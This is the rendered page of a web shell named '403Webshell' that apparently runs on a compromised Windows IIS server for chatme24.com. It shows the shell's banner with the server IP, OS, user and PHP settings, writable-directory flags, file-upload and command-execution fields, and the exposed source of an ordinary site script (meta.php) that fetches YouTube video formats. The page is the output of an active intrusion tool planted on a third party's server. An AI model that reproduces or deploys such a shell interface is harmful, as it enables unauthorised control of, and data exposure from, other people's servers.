403Webshell
Server IP : 209.209.40.120  /  Your IP : 216.73.217.112
Web Server : Microsoft-IIS/10.0
System : Windows NT NEWWWW 10.0 build 17763 (Windows Server 2019) i586
User : NEWWWW$ ( 0)
PHP Version : 8.3.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/HostingSpaces/admin/chatme24.com/wwwroot/_server/city_js/dev/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/HostingSpaces/admin/chatme24.com/wwwroot/_server/city_js/dev//meta.php
<?php
$urlMainStart = '../../../_include/core/main_start.php';
$g['mobile_redirect_off'] = true;
$formats = array('mp4' => array(37,22,18), 'webm' => array(45,44,43));
$urlSite = '';
include($urlMainStart);

$urlSite = Common::urlSiteSubfolders();
$option = 'loc_' . get_param('location') . '_quality';
$quality = Common::getOption($option, '3d_city_video');
$formatsAll = array('hd1080' => array(0, 37, 45),
                    'hd720' => array(1, 22, 44),
                    'large' => array(1, 22, 44),
                    'medium' => array(2, 18, 43));
$default = $formatsAll[$quality];
$i = 1;
foreach ($formats as $type => $tags) {
    unset($formats[$type][$default[0]]);
    array_unshift($formats[$type], $default[$i++]);
}

include('hash.php');

$urlVideo = get_param('id');
$format = 'mp4';
/*$ua = $_SERVER['HTTP_USER_AGENT'];
$isFirefox = mb_stripos($ua, 'Firefox', 0, 'UTF-8') !== false;
$isOpera = mb_stripos($ua, 'Opera', 0, 'UTF-8') !== false
           || (mb_stripos($ua, 'Chrome', 0, 'UTF-8') !== false && mb_stripos($ua, 'OPR', 0, 'UTF-8') !== false);
if ($isFirefox || $isOpera){
    $format = 'webm';
}*/

$response = checkCodeYouTubeVideoToDownload($urlVideo, $format, true, null, $formats);
echo json_encode($response);

$urlMainClose = '../../../_include/core/main_close.php';
if(file_exists($urlMainClose)) {
    include($urlMainClose);
}

Youez - 2016 - github.com/yon3zu
LinuXploit